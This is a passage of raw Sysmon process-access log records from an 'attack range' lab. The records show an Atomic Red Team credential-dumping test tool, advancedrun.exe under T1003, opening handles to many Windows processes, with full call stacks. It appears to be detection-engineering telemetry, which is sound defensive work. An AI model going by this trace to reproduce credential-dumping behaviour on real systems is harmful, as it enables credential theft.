dvancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
